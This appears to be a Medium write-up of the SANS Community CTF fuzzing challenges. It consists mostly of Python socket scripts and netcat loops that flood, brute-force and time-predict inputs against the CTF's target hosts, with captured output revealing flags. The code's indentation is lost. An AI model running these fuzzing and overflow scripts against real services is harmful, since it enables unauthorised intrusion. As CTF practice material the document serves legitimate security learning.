SANS Community CTF — Fuzzing

import socket#define variables for connection
server = 'F01-target.allyourbases.co'
port = 8142
#create a socket and send the first input
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
s.recv(1024)
s.send("A" + "\n")
#send 100 A's for subsequent inputs and print flag if received
for i in range(1,23):
s.send("A"*100 + "\n")
a = s.recv(1024)
if "Flag" in a:
#print(i+1)
print(a)
kali@kali:~/Desktop/SANS$ python -c 'print "A"*2161' | nc F01-target.allyourbases.co 8142
Network protocol expects validation frame. Value: DEBUG: User input is sizeof(27). Security UID is 0.
Retrying processor. Protocol re-ininitialize.
Network protocol expects validation frame. Value: DEBUG: User input is sizeof(27). Security UID is 0.
Retrying processor. Protocol re-ininitialize.
Network protocol expects validation frame. Value: DEBUG: User input is sizeof(27). Security UID is 0.
Retrying processor. Protocol re-ininitialize.
...[SNIP]...
Network protocol expects validation frame. Value: DEBUG: User input is sizeof(27). Security UID is 0.
Retrying processor. Protocol re-ininitialize.
Network protocol expects validation frame. Value: Security UID is 1.
Flag[KindCleverFuzzerUAre]
import socket#define variables for connection
server = 'F02-target.allyourbases.co'
port = 8143
#iterate through ascii keyboard set
for i in range(33,126):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
s.recv(1024)
print(chr(i))
s.send(chr(i) + "\n")
a = s.recv(1024)
print(a)
import socketserver = 'F02-target.allyourbases.co'
port = 8143
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
s.recv(1024)
for i in range(1,6):
s.send(";"*98 + "\n")
print(i)
s.recv(1024)
s.send(";" + "1"*41 +"\n")
print(s.recv(1024))
print("[!] F02 = " + s.recv(1024).split()[6])
import socket
import time

server = 'F03-target.allyourbases.co'
port = 8146

while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
s.recv(1024)
t = int(time.time())
t = t * 10
t = str(t)
print(t)
s.send(t + "\n")
a = s.recv(1024)
print(a)
if "Flag" in a:
break
import socket

while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('F03-target.allyourbases.co', 8146))
s.recv(1024)
s.send("\n")
a = str(s.recv(1024).split()[6].decode("utf-8"))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('F03-target.allyourbases.co', 8146))
s.recv(1024)
s.send(a + "\n")
flag = (s.recv(1024))
if "Flag" in flag:
print(flag.split()[7])
break
for x in {A..Z}; do echo $x;echo $x | nc F04-target.allyourbases.co 8154; done
for x in {A..Z}; do echo V$x;echo V$x | nc F04-target.allyourbases.co 8154; done
for x in {A..Z}; do echo VI$x;echo VI$x | nc F04-target.allyourbases.co 8154; done
for x in {A..Z}; do echo VIN$x;echo VIN$x | nc F04-target.allyourbases.co 8154; done

--

--

--

Cyber Gamer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Get to know a Sri Lankan HCI Researcher

July 28: Inside Cardstack This Week

Two men charged following day of action in Oldham

Two men charged following day of action in Oldham

UncleMine Leverages PenguinFinance’s Bonding Service to Mine the Protocol Owned Liquidity

I Got Blackmailed — How I Managed My Situation

{UPDATE} Se atreven a escapar Hack Free Resources Generator

Tell me if your Wallets are Safe after Learning about Starshell Wallet in this Post.

How to Adopt and Adapt NIST Information Security Framework at Your Organization.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
EricaZelic

EricaZelic

Cyber Gamer

More from Medium

Rooting Gryphon Routers via Shared VPN

Leviathan — OverTheWire Wargame — Writeup

Mustacchio Walkthrough | Try Hack Me | Ally Petitt

Alvin’s Dew Drop Daily — Issue #94